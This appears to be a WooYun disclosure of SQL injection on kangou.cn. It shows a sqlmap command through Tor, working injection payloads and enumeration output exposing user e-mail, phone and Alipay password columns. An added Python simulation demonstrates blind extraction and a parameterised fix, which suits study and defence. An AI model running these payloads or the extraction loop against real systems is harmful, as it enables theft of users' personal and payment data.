WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-10-04: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-11-18: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
看购网 (kangou.cn) has a SQL injection that can lead to the leak of sensitive data of several hundred thousand users
This only proves that the vulnerability exists; no user data was dumped.
./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEU --union-char=N -u "http://bbs.kangou.cn/cinema/cinemainfo.aspx" --data="id=389ec2da-eabb-421c-806d-e39cb77dbf44&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab" --dbs --is-dba --current-db
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=389ec2da-eabb-421c-806d-e39cb77dbf44' AND 6955=6955 AND 'UMSL'='UMSL&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=389ec2da-eabb-421c-806d-e39cb77dbf44' AND 3088=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3088=3088) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'gSXv'='gSXv&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab
---
current database: 'lookango'
current user is DBA: False
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] filminfo
[*] lkgimage
[*] lookango
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test1
[*] test2

Database: lookango
[113 tables]
+--------------------------------+
| DU_Applications                |
| DU_Articles                    |
<...omitted...>
| LKG_Gift                       |
| LKG_GiftCard                   |
| LKG_GiftCardBuy                |
| LKG_GiftCardBuyOrder           |
| LKG_GiftCardDiscount           |
+--------------------------------+

In one table I found, of all things, Alipay account IDs together with passwords:
+---------------------+------------------+
| Column              | Type             |
+---------------------+------------------+
| AlipayID            | nvarchar         |
<...astonishing...>
| UserAlipayPass      | nvarchar         |
+---------------------+------------------+

Database: lookango
Table: LKG_API_UserDatas
[12 columns]
+---------------------+------------------+
| Column              | Type             |
+---------------------+------------------+
| API_Log_CardTID     | uniqueidentifier |
| API_Log_Mail        | nvarchar         |  ===> user e-mail
| API_Log_Mobile      | nvarchar         |  ===> user mobile number
| API_Log_TicketCount | int              |
| API_LogEvent        | nvarchar         |
| API_LogHashcodeIn   | nvarchar         |
| API_LogHashcodeOut  | nvarchar         |
| API_LogTime         | datetime         |
| API_UserID          | nvarchar         |
| API_UserIP          | nvarchar         |
| API_UserLogID       | uniqueidentifier |
| API_UserOrderID     | nvarchar         |
+---------------------+------------------+
[14:55:04] [INFO] retrieved: 1185391
Database: lookango
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| dbo.LKG_API_UserDatas | 1185391 |  ===> over a million rows
+-----------------------+---------+

Database: lookango
Table: LKG_CardOrders
[43 columns]
+---------------------------------+------------------+
| Column                          | Type             |
+---------------------------------+------------------+
| billOrgId_i                     | nvarchar         |
| CardCode                        | nvarchar         |
| CardOrderCount                  | int              |
| CardOrderID                     | uniqueidentifier |
| CardOrderIDCard                 | nvarchar         |
| CardOrderMail                   | nvarchar         |  ===> user e-mail
| CardOrderMoneyBackBalanceAfter  | int              |
| CardOrderMoneyBackBalanceBefore | int              |
| CardOrderMoneyBackTime          | datetime         |
| CardOrderMoneyBackUserID        | int              |
| CardOrderMoneyIsBack            | bit              |
| CardOrderMonth                  | int              |
| CardOrderNumber                 | nvarchar         |
| CardOrderPassword               | nvarchar         |
| CardOrderPayKind                | int              |
| CardOrderPayTime                | datetime         |
| CardOrderPhone                  | nvarchar         |  ===> user phone number
| CardOrderPrice                  | int              |
| CardOrderStatus                 | nvarchar         |
| CardOrderTime                   | datetime         |
| CardTongKindPosID               |                  |
| CheapCardID                     | uniqueidentifier |
| CheapPrice                      | int              |
| CheapPriceBefore                | int              |
| CinemaId                        | uniqueidentifier |
| GHCardNumber                    | nvarchar         |
| MaiZuoCinemaId                  | int              |
| MaiZuoMaizuoSeq                 | nvarchar         |
| MaiZuoRandCode                  | nvarchar         |
| MaiZuoRemainingCount            | int              |
| MaiZuoResultMsg                 | nvarchar         |
| MaiZuoStatus                    | int              |
| MaiZuoTime                      | datetime         |
| MerchantID                      | uniqueidentifier |
| merSysId                        | nvarchar         |
| RelationUserID                  | uniqueidentifier |
| TuanGouID                       | uniqueidentifier |
| UserID                          | uniqueidentifier |
| UserIP                          | nvarchar         |
| yinliangateId                   | nvarchar         |
| yinlianUserId                   | nvarchar         |
| YL_Order                        | nvarchar         |
| yl_order_i                      | nvarchar         |
+---------------------------------+------------------+
[15:23:12] [INFO] retrieved: 235359
Database: lookango
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| dbo.LKG_CardOrders | 235359  |  ===> several hundred thousand rows
+--------------------+---------+
Fix: filter the input.
Vendor response: the vendor could not be reached, or actively refused.
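The following is an added example, not code from the WooYun report or from kangou.cn. It is a Python simulation of the two things the report documents: the boolean-based blind injection that sqlmap found in the `id` parameter of cinemainfo.aspx, and the "filter the input" fix. The page handler (`cinemainfo_vulnerable`, `cinemainfo_fixed`), the `Cinemas` and `LKG_Users` tables and the value `s3cret` are invented for illustration; an in-memory SQLite database stands in for the site's SQL Server 2008, so the payloads use SQLite's `unicode(substr(...))` where sqlmap would send `ASCII(SUBSTRING(...))` to MSSQL. `blind_extract` recovers a column value one character at a time through the page's true/false behaviour, exactly the request pattern behind sqlmap's `retrieved:` lines; `decode_char_chain` shows what the `CHAR()` chains in the error-based payload decode to; and the hardened handler, which validates `id` as a GUID (the column is a `uniqueidentifier`) and binds it as a parameter, gives the same extraction loop nothing to work with.

```python
"""Simulation of the cinemainfo.aspx injection and of the suggested fix.

Added example: not code from the WooYun report or from kangou.cn. The page
handlers, table layout and row contents are constructed; an in-memory SQLite
database stands in for the site's SQL Server 2008 backend.
"""
import re
import sqlite3

# The id value from the report's POST body; in this simulation it is a real row.
REPORT_ID = "389ec2da-eabb-421c-806d-e39cb77dbf44"

# A uniqueidentifier only ever looks like this; anything else is not a valid id.
GUID_RE = re.compile(
    r"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$"
)


def make_db():
    """Constructed stand-in for the 'lookango' database (two tiny tables)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Cinemas (CinemaId TEXT, Name TEXT)")
    conn.execute("INSERT INTO Cinemas VALUES (?, ?)", (REPORT_ID, "Demo Cinema"))
    # Column name taken from the report; the table name and value are made up.
    conn.execute("CREATE TABLE LKG_Users (UserAlipayPass TEXT)")
    conn.execute("INSERT INTO LKG_Users VALUES ('s3cret')")
    return conn


def cinemainfo_vulnerable(conn, cinema_id):
    """Returns True when the page would render a cinema, False otherwise.

    The WHERE clause is built by string concatenation, which is the defect the
    boolean-based and error-based payloads in the report rely on."""
    sql = "SELECT Name FROM Cinemas WHERE CinemaId = '" + cinema_id + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def cinemainfo_fixed(conn, cinema_id):
    """Hardened handler: reject anything that is not a GUID, then bind the value
    as a parameter so it can never become SQL syntax. Either measure alone stops
    the payloads below; together they also keep junk out of the database."""
    if not GUID_RE.match(cinema_id):
        return False
    row = conn.execute(
        "SELECT Name FROM Cinemas WHERE CinemaId = ?", (cinema_id,)
    ).fetchone()
    return row is not None


def blind_extract(page, base_id, subquery, max_len=64):
    """Boolean-based blind extraction as sqlmap performs it.

    `page(payload)` is the true/false oracle (cinema shown or not). Each
    character of the subquery's result is found by binary search over its code
    point, 7 requests per character. The payload shape mirrors the report's
    `...' AND 6955=6955 AND 'UMSL'='UMSL`. Against SQL Server sqlmap uses
    ASCII(SUBSTRING(...)); SQLite spells it unicode(substr(...))."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"coalesce(unicode(substr(({subquery}),{pos},1)),0) > {mid}"
            if page(f"{base_id}' AND {cond} AND 'x'='x"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string
            break
        out += chr(lo)
    return out


def decode_char_chain(expr):
    """Turns a sqlmap CHAR(n)+CHAR(n)+... chain into text. In the report's
    error-based payload the two chains decode to the markers 'qvpjq' and
    'qzjjq'; CONVERT(INT, <marker>1<marker>) fails, the DBMS error message
    echoes the offending string, and sqlmap reads the result between the markers."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


if __name__ == "__main__":
    db = make_db()
    secret = "SELECT UserAlipayPass FROM LKG_Users"
    print("vulnerable:", blind_extract(lambda p: cinemainfo_vulnerable(db, p), REPORT_ID, secret))
    print("fixed:     ", repr(blind_extract(lambda p: cinemainfo_fixed(db, p), REPORT_ID, secret)))
    print("markers:   ", decode_char_chain("CHAR(113)+CHAR(118)+CHAR(112)+CHAR(106)+CHAR(113)"))
```

Against the vulnerable handler the loop recovers `s3cret` with seven requests per character, which is why the report could learn the database name, table list and row counts without the page ever displaying a query result. Against the fixed handler every payload is rejected before it reaches the database and the loop returns an empty string; dropping the GUID check but keeping the `?` placeholder gives the same result, since the whole payload is then compared as a literal string.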